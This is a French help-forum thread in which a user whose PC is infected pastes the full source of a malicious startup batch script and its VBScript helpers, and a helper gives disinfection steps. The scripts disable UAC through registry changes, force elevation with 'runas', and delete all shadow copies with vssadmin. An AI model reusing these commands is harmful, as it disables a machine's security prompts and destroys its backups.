IdentifiantMot de passe
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Fichier batch qui s'exécute à tous les démarrages


Sujet :

Sécurité

  1. 30/08/2013, 15h24 #1
    ledouxxx
    ledouxxx est déconnecté
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2013
    Messages
    10
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Santé

    Informations forums :
    Inscription : Août 2013
    Messages : 10
    Points : 5
    Points
    5
    Par défaut Fichier batch qui s'exécute à tous les démarrages
    Bonjour à tous.
    j'ai un fichier qui s'exécute avec l'invite de commandes à tous les démarrages de mon PC et qui, quand je lui refuse la permission de s’exécuter (user control account), il revient jusqu'à ce que j'accepte pourqu'il me laisse faire autre chose. lorsque j'accepte, il va dans contrôle de compte administrateur et baisse le contrôle d’exécution de programmes au niveau zéro. j'ai pu le localiser (lorsqu'il me demande la permission) dans le dossier C:\users\moi\AppData\local\temp et c'est un fichier batch qui se nomme uac.bat et quand il s’exécute, il crée d'autres fichiers sur place dont: CPBA.bat, Admin.vbe et tp.vbe. voici les programmes de tous ces fichiers: (quand je les ouvre avec notepad)

    uac.bat:

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    @echo off 
mode con lines=1 cols=14 
ver | find /i "version 6.1." > nul 
if %errorlevel%==0 goto patch 
ver | find /i "version 6.0." > nul 
if %errorlevel%==0 goto patch 
:exit 
exit 
:patch 
if exist "%temp%\ADMIN.vbe" del /q /s /f "%temp%\ADMIN.vbe" > nul 
if exist "%temp%\CPBA.bat" del /q /s /f "%temp%\CPBA.bat" > nul 
echo set objshell = createobject("shell.application") > "%temp%\ADMIN.vbe" 
echo set fsO = createobject("scripting.filesystemobject") >> "%temp%\ADMIN.vbe" 
echo strpath = fso.getparentfoldername(wscript.scriptfullname) >> "%temp%\ADMIN.vbe" 
echo objshell.shellexecute "cmd.exe", "/c" ^& Chr(34) ^& strpath ^& "\CPBA.bat" ^& Chr(34), "", "runas", 0 >> "%temp%\ADMIN.vbe" 
echo wscript.sleep 1000 >> "%temp%\ADMIN.vbe" 
echo on error resume next >> "%temp%\tp.vbe" 
echo WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD" >> "%temp%\tp.vbe" 
echo "%temp%\tp.vbe" >> "%temp%\CPBA.bat" 
echo del/f/q "%temp%\tp.vbe" >> "%temp%\CPBA.bat" 
echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f ^> nul >> "%temp%\CPBA.bat" 
echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f ^> nul >> "%temp%\CPBA.bat" 
start "" /wait "%temp%\ADMIN.vbe" 
reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua | find /i "0x0" >nul 
if %errorlevel%==0 goto ok 
start ""/wait/MAX "%temp%\uac.bat" 
:ok 
if exist "%temp%\ADMIN.vbe" del /q /s /f "%temp%\ADMIN.vbe" > nul 
if exist "%temp%\CPBA.bat" del /q /s /f "%temp%\CPBA.bat" > nul 
vssadmin delete shadows /all /quiet 
EXIT
    CPBA.bat:

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    "C:\Users\TRSORM~1\AppData\Local\Temp\tp.vbe"  
del/f/q "C:\Users\TRSORM~1\AppData\Local\Temp\tp.vbe"  
reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f > nul  
reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f > nul
    Admin.vbe:

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    set objshell = createobject("shell.application")  
set fsO = createobject("scripting.filesystemobject")  
strpath = fso.getparentfoldername(wscript.scriptfullname)  
objshell.shellexecute "cmd.exe", "/c" & Chr(34) & strpath & "\CPBA.bat" & Chr(34), "", "runas", 0  
wscript.sleep 1000
    tp.vbe:

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    on error resume next  
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"  
on error resume next  
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"  
on error resume next  
WScript.CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"

    je veux vraiment que vous m'aidiez à supprimer ce programme (fichier ou virus, je ne sais pas)

    je signale que j'utilise l'antivirus avg à jour, et qu'en principe il ne laisse passer aucun virus.
    je vous remercie d'avance et j'attends vos réponses.
    Répondre avec citation Répondre avec citation   0  0
  2. 31/08/2013, 14h18 #2
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut

    * Télécharger sur le bureau RogueKiller (par tigzy)
    * Quitter tous les programmes en cours
    * Lancer RogueKiller.exe.
    * Attendre la fin du Prescan ...
    puis
    * Cliquer sur Scan



    * Attendre la fin du scan. A ce stade aucune modification n'a été apportée au système
    * Le rapport a été généré sur le bureau. On peut également l'ouvrir avec le bouton Rapport.
    Il peut être utile pour la personne vous aidant.

    * Dans l'onglet Registre, décocher les éventuels faux positifs.
    * Cliquer sur le bouton Suppression.
    A l'inverse du bouton Scan, ce bouton supprime les infections de type rogue et modifie donc le système.



    * Le rapport a été généré sur le bureau. On peut également l'ouvrir avec le bouton Rapport.
    Il peut être utile pour la personne vous aidant.

    Et passez un coup avec CCleaner pour supprimer les fichiers temporaires

    Puis exécutez ce vbscript ListProcessCmdLine.vbs pour afficher tous les processus en cours d'exécution et les éléments à démarrage automatique puis Poster le résultat généré par ce dernier dans la réponse aussi

    * Pour restaurer les fichiers et les dossiers cachés et supprimer les raccourcis infectés , Utilisez ShortcutRemover

    Bonne Chance à vous
    Répondre avec citation Répondre avec citation   0  0
  3. 01/09/2013, 19h33 #3
    ledouxxx
    ledouxxx est déconnecté
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2013
    Messages
    10
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Santé

    Informations forums :
    Inscription : Août 2013
    Messages : 10
    Points : 5
    Points
    5
    Par défaut
    Bonjour à tous.
    Merci déjà pour avoir porté intérêt à mon problème. pour le moment, j'ai procédé aux deux propositions ci-dessus mais le resultat n'est pas positif: quand je supprime les fichiers du dossier temporaire, il sont présents au prochain démarrage.
    j'ai nétoye la machine avec RogueKiller et le problème persiste.ci-dessous sont les rapports générés par Roguekiller et par le script vbs pour la liste de processus :

    Rapport Roguekiller:

    RogueKiller V8.6.7 _x64_ [Aug 28 2013] by Tigzy
    mail : tigzyRK<at>gmail<dot>com
    Feedback : http://www.adlice.com/forum/
    Website : http://www.adlice.com/softwares/roguekiller/
    Blog : http://tigzyrk.blogspot.com/

    Operating System : Windows 7 (6.1.7600 ) 64 bits version
    Started in : Normal mode
    User : Romantique Ledoux [Admin rights]
    Mode : Remove -- Date : 09/01/2013 15:06:16
    | ARK || FAK || MBR |

    ¤¤¤ Bad processes : 1 ¤¤¤
    [SUSP PATH] ouc.exe -- C:\ProgramData\Mobile Partner\OnlineUpdate\ouc.exe [7] -> KILLED [TermProc]

    ¤¤¤ Registry Entries : 8 ¤¤¤
    [RUN][SUSP PATH] HKCU\[...]\Run : Google Update ("C:\Users\Romantique Ledoux\AppData\Local\Google\Update\GoogleUpdate.exe" /c [7]) -> DELETED
    [RUN][SUSP PATH] HKUS\S-1-5-21-1846763386-2663678330-1733473899-1000\[...]\Run : Google Update ("C:\Users\Romantique Ledoux\AppData\Local\Google\Update\GoogleUpdate.exe" /c [7]) -> [0x2] The system cannot find the file specified.
    [HJ POL] HKCU\[...]\System : DisableTaskMgr (0) -> DELETED
    [HJ POL] HKCU\[...]\System : DisableRegistryTools (0) -> DELETED
    [HJ POL] HKLM\[...]\System : ConsentPromptBehaviorUser (0) -> REPLACED (1)
    [HJ POL] HKLM\[...]\Wow6432Node\[...]\System : ConsentPromptBehaviorUser (0) -> REPLACED (1)
    [HJ DESK] HKLM\[...]\NewStartPanel : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -> REPLACED (0)
    [HJ DESK] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> REPLACED (0)

    ¤¤¤ Scheduled tasks : 16 ¤¤¤
    [V1][SUSP PATH] At6.job : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V1][SUSP PATH] At5.job : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V1][SUSP PATH] At4.job : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V1][SUSP PATH] At3.job : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V1][SUSP PATH] At2.job : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V1][SUSP PATH] At1.job : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V1][SUSP PATH] GoogleUpdateTaskUserS-1-5-21-1846763386-2663678330-1733473899-1000UA.job : C:\Users\Romantique Ledoux\AppData\Local\Google\Update\GoogleUpdate.exe - /ua /installsource scheduler [7][x] -> DELETED
    [V1][SUSP PATH] GoogleUpdateTaskUserS-1-5-21-1846763386-2663678330-1733473899-1000Core.job : C:\Users\Romantique Ledoux\AppData\Local\Google\Update\GoogleUpdate.exe - /c [7] -> DELETED
    [V2][SUSP PATH] At1 : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V2][SUSP PATH] At2 : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V2][SUSP PATH] At3 : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V2][SUSP PATH] At4 : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> DELETED
    [V2][SUSP PATH] At5 : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> ERROR DELETING TASK
    [V2][SUSP PATH] At6 : C:\Users\RMANTL~1\AppData\Local\Temp\fontviewa.exe [x] -> ERROR DELETING TASK
    [V2][SUSP PATH] GoogleUpdateTaskUserS-1-5-21-1846763386-2663678330-1733473899-1000Core : C:\Users\Romantique Ledoux\AppData\Local\Google\Update\GoogleUpdate.exe - /c [7] -> ERROR DELETING TASK
    [V2][SUSP PATH] GoogleUpdateTaskUserS-1-5-21-1846763386-2663678330-1733473899-1000UA : C:\Users\Romantique Ledoux\AppData\Local\Google\Update\GoogleUpdate.exe - /ua /installsource scheduler [7][x] -> ERROR DELETING TASK

    ¤¤¤ Startup Entries : 0 ¤¤¤

    ¤¤¤ Web browsers : 2 ¤¤¤

    ¤¤¤ Particular Files / Folders: ¤¤¤

    ¤¤¤ Driver : [NOT LOADED 0x0] ¤¤¤

    ¤¤¤ External Hives: ¤¤¤

    ¤¤¤ Infection : ¤¤¤

    ¤¤¤ HOSTS File: ¤¤¤
    --> %SystemRoot%\System32\drivers\etc\hosts




    ¤¤¤ MBR Check: ¤¤¤

    +++++ PhysicalDrive0: ST9250827AS +++++
    --- User ---
    [MBR] 670a2c4ae9d9986c8b21ccb3e6663008
    [BSP] 667bc8b0918280dda25cbccb2bc0f00b : MBR Code unknown
    Partition table:
    0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 238472 Mo
    User = LL1 ... OK!
    User = LL2 ... OK!

    Finished : << RKreport[0]_D_09012013_150616.txt >>
    RKreport[0]_S_09012013_150321.txt
    Liste des processus:

    BIOS HPQOEM - 1

    Nom de l'ordinateur : METATITRE
    Fabriquant: Hewlett-Packard
    Modèle : HP Pavilion dv7 Notebook PC

    Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition1
    Version 6.1.7600
    Service Pack 0.0
    Dossier de Windows: C:\Windows

    **************Liste des Processus en cours d'exécution le 01/09/2013 à 15:33:06 sur Le PC METATITRE connecté en tant que Romantique Ledoux**************
    ********************************************************************************
    Numéro PID = 0
    Nom du Processus = System Idle Process
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 4
    Nom du Processus = System
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 368
    Nom du Processus = smss.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 504
    Nom du Processus = csrss.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 568
    Nom du Processus = wininit.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 580
    Nom du Processus = csrss.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 588
    Nom du Processus = avgchsva.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 596
    Nom du Processus = avgrsa.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 664
    Nom du Processus = services.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 672
    Nom du Processus = lsass.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 680
    Nom du Processus = lsm.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 808
    Nom du Processus = winlogon.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 856
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 920
    Nom du Processus = nvvsvc.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 520
    Nom du Processus = nvSCPAPISvr.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 676
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1052
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1180
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1208
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1736
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1812
    Nom du Processus = vfsFPService.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1852
    Nom du Processus = rundll32.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1908
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1116
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1512
    Nom du Processus = spoolsv.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1488
    Nom du Processus = DpHostW.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1332
    Nom du Processus = avgwdsvc.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1700
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1948
    Nom du Processus = srvany.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1940
    Nom du Processus = KMS Server Service.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 2244
    Nom du Processus = SeaPort.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 2292
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 2472
    Nom du Processus = dllhost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 2620
    Nom du Processus = avgnsa.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 2088
    Nom du Processus = taskhost.exe
    Ligne de Commande = "taskhost.exe"
    ****************************************************************************************************
    Numéro PID = 2332
    Nom du Processus = dwm.exe
    Ligne de Commande = "C:\Windows\system32\Dwm.exe"
    ****************************************************************************************************
    Numéro PID = 2576
    Nom du Processus = explorer.exe
    Ligne de Commande = C:\Windows\Explorer.EXE
    ****************************************************************************************************
    Numéro PID = 3244
    Nom du Processus = SmartMenu.exe
    Ligne de Commande = "C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe" /background
    ****************************************************************************************************
    Numéro PID = 3260
    Nom du Processus = rundll32.exe
    Ligne de Commande = "C:\Windows\System32\rundll32.exe" C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
    ****************************************************************************************************
    Numéro PID = 3268
    Nom du Processus = sttray64.exe
    Ligne de Commande = "C:\Program Files\IDT\WDM\sttray64.exe"
    ****************************************************************************************************
    Numéro PID = 3288
    Nom du Processus = SuperCopier2.exe
    Ligne de Commande = "C:\Program Files (x86)\SuperCopier2\SuperCopier2.exe"
    ****************************************************************************************************
    Numéro PID = 3336
    Nom du Processus = sidebar.exe
    Ligne de Commande = "C:\Program Files\Windows Sidebar\sidebar.exe" /autoRun
    ****************************************************************************************************
    Numéro PID = 3384
    Nom du Processus = GoogleToolbarNotifier.exe
    Ligne de Commande = "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
    ****************************************************************************************************
    Numéro PID = 3544
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 3668
    Nom du Processus = PWRISOVM.EXE
    Ligne de Commande = "C:\Program Files (x86)\PowerISO\PWRISOVM.EXE"
    ****************************************************************************************************
    Numéro PID = 3820
    Nom du Processus = AgentAntidote64.exe
    Ligne de Commande = "C:\Program Files (x86)\Druide\Antidote 7\Programmes64\AgentAntidote64.exe" /LancementSession
    ****************************************************************************************************
    Numéro PID = 3944
    Nom du Processus = avgtray.exe
    Ligne de Commande = "C:\Program Files (x86)\AVG\AVG9\avgtray.exe"
    ****************************************************************************************************
    Numéro PID = 3976
    Nom du Processus = pdf24.exe
    Ligne de Commande = "C:\Program Files (x86)\PDF24\pdf24.exe"
    ****************************************************************************************************
    Numéro PID = 4032
    Nom du Processus = HPWAMain.exe
    Ligne de Commande = "C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe"
    ****************************************************************************************************
    Numéro PID = 3140
    Nom du Processus = QLBCtrl.exe
    Ligne de Commande = "C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCtrl.exe" /Start
    ****************************************************************************************************
    Numéro PID = 3752
    Nom du Processus = CardDetector.exe
    Ligne de Commande = "C:\Program Files (x86)\CardDetector\HUAWEI1752_1552\CardDetector.exe"
    ****************************************************************************************************
    Numéro PID = 4020
    Nom du Processus = WiMAXDevDetector.exe
    Ligne de Commande = "C:\Program Files (x86)\WiMAXCM\WiMAXDevDetector.exe"
    ****************************************************************************************************
    Numéro PID = 4056
    Nom du Processus = hpwuschd2.exe
    Ligne de Commande = "C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe"
    ****************************************************************************************************
    Numéro PID = 4088
    Nom du Processus = DpAgent.exe
    Ligne de Commande = "C:\Program Files (x86)\DigitalPersona\Bin\DpAgent.exe"
    ****************************************************************************************************
    Numéro PID = 4044
    Nom du Processus = DpAgent.exe
    Ligne de Commande = "C:\Program Files\DigitalPersona\Bin\DPAgent.exe"
    ****************************************************************************************************
    Numéro PID = 4240
    Nom du Processus = SearchIndexer.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 4408
    Nom du Processus = hpqWmiEx.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 4444
    Nom du Processus = WmiPrvSE.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 4632
    Nom du Processus = Com4QLBEx.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 3920
    Nom du Processus = HpqToaster.exe
    Ligne de Commande = "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe" -Embedding
    ****************************************************************************************************
    Numéro PID = 4192
    Nom du Processus = hpCaslNotification.exe
    Ligne de Commande = "C:\Program Files (x86)\Hewlett-Packard\Shared\hpCaslNotification.exe" "<hpNotification><Toast><ID>27342</ID><Title>HP Wireless Assistant</Title><Text>WLAN : On</Text><IconPath>C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\images\wireless_on.ico</IconPath><Path>C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe</Path><Parameters>SHOWSTATUS</Parameters></Toast></hpNotification>"
    ****************************************************************************************************
    Numéro PID = 4012
    Nom du Processus = taskeng.exe
    Ligne de Commande = taskeng.exe {EFFB4AB4-AA94-43CC-9191-CBE5E659F7E7}
    ****************************************************************************************************
    Numéro PID = 4144
    Nom du Processus = TVAgent.exe
    Ligne de Commande = "c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe"
    ****************************************************************************************************
    Numéro PID = 4688
    Nom du Processus = DVDAgent.exe
    Ligne de Commande = "c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe"
    ****************************************************************************************************
    Numéro PID = 2748
    Nom du Processus = wmpnetwk.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 2992
    Nom du Processus = mswinext.exe
    Ligne de Commande = "C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\mswinext.exe"
    ****************************************************************************************************
    Numéro PID = 4760
    Nom du Processus = SystemProtection.exe
    Ligne de Commande = "C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat
    ****************************************************************************************************
    Numéro PID = 1400
    Nom du Processus = svchost.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 1960
    Nom du Processus = iexplore.exe
    Ligne de Commande = "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    ****************************************************************************************************
    Numéro PID = 2380
    Nom du Processus = iexplore.exe
    Ligne de Commande = "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1960 CREDAT:71937
    ****************************************************************************************************
    Numéro PID = 4440
    Nom du Processus = RogueKillerX64.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 3216
    Nom du Processus = avgcsrva.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 956
    Nom du Processus = ASC.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 5892
    Nom du Processus = ASCTray.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 6852
    Nom du Processus = audiodg.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 3452
    Nom du Processus = WmiPrvSE.exe
    Ligne de Commande =
    ****************************************************************************************************
    Numéro PID = 5508
    Nom du Processus = wscript.exe
    Ligne de Commande = "C:\Windows\System32\WScript.exe" "C:\Users\Romantique Ledoux\Documents\Downloads\Compressed\ListProcessCmdLine\ListProcessCmdLine.vbs"
    ****************************************************************************************************
    Il y a 77 Processus en cours d'exécution le 01/09/2013 à 15:33:06 sur Le PC METATITRE connecté en tant que Romantique Ledoux

    ************************************************** Les éléments à démarrage automatique ****************************************
    Nom: SuperCopier2.exe
    Description: SuperCopier2.exe
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files (x86)\SuperCopier2\SuperCopier2.exe
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: E09FXLRD_234074242
    Description: E09FXLRD_234074242
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: "C:\Program Files (x86)\Microsoft Encarta\Microsoft Encarta 2009 - Collection DVD\EDICT.EXE" -m
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: IDMan
    Description: IDMan
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files (x86)\Internet Download Manager\IDMan.exe /onboot
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: DAEMON Tools Pro Agent
    Description: DAEMON Tools Pro Agent
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: "C:\Program Files (x86)\DAEMON Tools Pro\DTAgent.exe" -autorun
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: Sidebar
    Description: Sidebar
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: Advanced SystemCare 6
    Description: Advanced SystemCare 6
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: "C:\Program Files (x86)\IObit\Advanced SystemCare 6\ASCTray.exe" /AutoStart
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: swg
    Description: swg
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: LMDVox
    Description: LMDVox
    Emplacement: HKU\S-1-5-21-1846763386-2663678330-1733473899-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files (x86)\Micro Application\Votre PC prend la parole\LMDVox.exe Lancement
    Utilisateur: METATITRE\Romantique Ledoux
    ****************************************************************************************************
    Nom: SmartMenu
    Description: SmartMenu
    Emplacement: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background
    Utilisateur: Public
    ****************************************************************************************************
    Nom: NvCplDaemon
    Description: NvCplDaemon
    Emplacement: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
    Utilisateur: Public
    ****************************************************************************************************
    Nom: NvMediaCenter
    Description: NvMediaCenter
    Emplacement: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
    Utilisateur: Public
    ****************************************************************************************************
    Nom: SysTrayApp
    Description: SysTrayApp
    Emplacement: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files\IDT\WDM\sttray64.exe
    Utilisateur: Public
    ****************************************************************************************************
    Nom: IAAnotif
    Description: IAAnotif
    Emplacement: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Commande: C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe
    Utilisateur: Public
    ****************************************************************************************************
    J'attend vos propositions.
    Cordialement
    Répondre avec citation Répondre avec citation   0  0
  4. 01/09/2013, 21h33 #4
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut
    Maintenant
    Téléchargez sur le bureau Malwarebyte's Anti-Malware


    • => double-clic sur mbam-setup pour lancer l'installation
    • => Installer simplement sans rien modifier
    • => Faites les mises à jour (Clic sur "Mise à jour" puis "Recherche de mises à jour").
    • => si la mise à jour a échoué, la faire après execution du logiciel => onglet "Mise à jour"
    • => Quand le programme lancé ==> Cocher Exécuter un examen complet
    • => Clic Rechercher
    • => Eventuellement décocher les disques à ne pas analyser
    • => Clic Lancer l'examen
    • => En fin de scan ( 1h environ), si infection trouvée
    • => Clic Afficher résultat
    • => Fermer vos applications en cours
    • => Si MalwareByte's n'a rien détecté, cliquez sur OK Un rapport va apparaître fermez-le.
    • => Si MalwareByte's a détecté des infections, cliquez sur Afficher les résultats ensuite Vérifier si tout est coché et clic Supprimer la sélection.
    • => Note : Si MalwareByte's a besoin de redémarrer pour terminer la suppression, acceptez en cliquant sur "OK".
      un rapport s'ouvre le copier et le coller dans la réponse





    et complétez le travail avec : AdwCleaner
    AdwCleaner est un outil visant à supprimer :


    • Les adware (programmes publicitaires)
